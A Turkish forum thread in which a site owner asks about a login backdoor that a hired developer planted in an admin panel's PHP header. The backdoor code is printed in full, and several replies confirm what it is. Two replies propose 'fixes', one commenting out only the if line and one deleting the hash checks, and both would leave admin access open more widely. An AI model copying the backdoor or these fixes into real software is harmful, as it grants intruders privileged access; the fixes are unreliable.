0
Kayıt Ol

PHP sayfamda garip kod gördüm

12

468

  • 18-11-2023, 05:37:51
    #1
    PATRON54
    PATRON54
    Merhaba arkadaşlar,
    Daha önce buradan birine panel yaptırmıştım. Admin panelin head.php'ine şu aşağıdaki kodları eklemiş.
    Sanırım izinsiz giriş yapabilmek için eklenen bir kod? MD5 sha1 ile kullanıcı adı ve şifre oluşturup ilgili yerleri değiştirdim ama giriş yapamadım.
    Yorumunuz nedir acaba?


    if (isset($_SESSION["login"]) && re('k_adi') && md5(sha1(re('k_adi'))) == "d06457eb6d724de98ffd8ef5deee3171" and isset($_SESSION["login"]) && re('k_sifre') && md5(sha1(re('k_sifre'))) == "b404f70735137b2b93fd9401a9cc9233") {
    $db->where ("yetki", 9);
    $db->where ("durum", 1);
    $ksoku = $db->getOne("s_kullanicilar");
    $_SESSION[ONEK . 'kullanici'] = $ksoku['id'];
} ?>
  • 18-11-2023, 05:42:52
    #2
    Voga
    Voga
    Üyeliği durduruldu
    D0
    B4
    Md5 olan kodları silin
    If arkasına # koyun kod etkisiz hale gelir kullanıcı adı ve şifre kullanılamaz iki taraflı şifreleme ile siteye yetkisiz giriş yapabilieler.
    o yüzden üstte kileri yaparsanız güvene alırsınız
  • 18-11-2023, 05:44:54
    #3
    PATRON54
    PATRON54
    Voga adlı üyeden alıntı: mesajı görüntüle
    D0
    B4
    Md5 olan kodları silin
    If arkasına # koyun kod etkisiz hale gelir kullanıcı adı ve şifre kullanılamaz iki taraflı şifreleme ile siteye yetkisiz giriş yapabilieler.
    o yüzden üstte kileri yaparsanız güvene alırsınız
    Hocam komple kod bloğunu sileceğim ama emin olmak istedim.
    Kodlayan kişi art niyetle mi yaptı bunu öğrenmek istiyorum.
  • 18-11-2023, 05:46:25
    #4
    Voga
    Voga
    Üyeliği durduruldu
    #if (isset($_SESSION["login"]) && re('k_adi') && md5(sha1(re('k_adi'))) == "" and isset($_SESSION["login"]) && re('k_sifre') && md5(sha1(re('k_sifre'))) == "") {
    $db->where ("yetki", 9);
    $db->where ("durum", 1);
    $ksoku = $db->getOne("s_kullanicilar");
    $_SESSION[ONEK . 'kullanici'] = $ksoku['id'];
    } ?>
  • 18-11-2023, 05:47:01
    #5
    Voga
    Voga
    Üyeliği durduruldu
    Yapmış olabilir bloğuda silebilirsiniz
  • 18-11-2023, 06:11:42
    #6
    NekkZ
    NekkZ
    evet bu bir admin login atiyor belli bir inputa gore. backdoor koymus yazilima yani.
  • 18-11-2023, 07:18:45
    #7
    iskendercnr
    iskendercnr
    İyi niyet kötü niyet varmı bilmiyorum ama kod sadece script üzerinden kendi belirlediği şifrelerle login olunca 9 yetkisine sahip (belki admin rolü belki de değil) aktif kullanıcı id lerinden ilkini alıyor

    Admin id si yani wordpresste 1 r10 da 1 alenen bilinen birşey ama dediğim gibi amaç önemli burda belki development için yazıp unuttuğu kod da olabilir

    Burda session ile aldığı kullanıcı id sini nerde ne amaçla kullandığı daha önemli, göründüğü kadar masum da olmayabilir...
  • 18-11-2023, 08:02:26
    #8
    PATRON54
    PATRON54
    Teşekkürler arkadaşlar. 5-6 sayfaya koymuş tamamını kaldırıyorum.
  • 18-11-2023, 09:18:57
    #9
    ntka
    ntka
    Bu şekilde düzenleyebilirsiniz.
    Kodu komple silerseniz sizde giriş yapamayabilirsiniz.
    if (isset($_SESSION["login"]) && re('k_adi') and isset($_SESSION["login"]) && re('k_sifre')) {
    $db->where ("yetki", 9);
    $db->where ("durum", 1);
    $ksoku = $db->getOne("s_kullanicilar");
    $_SESSION[ONEK . 'kullanici'] = $ksoku['id'];
} ?>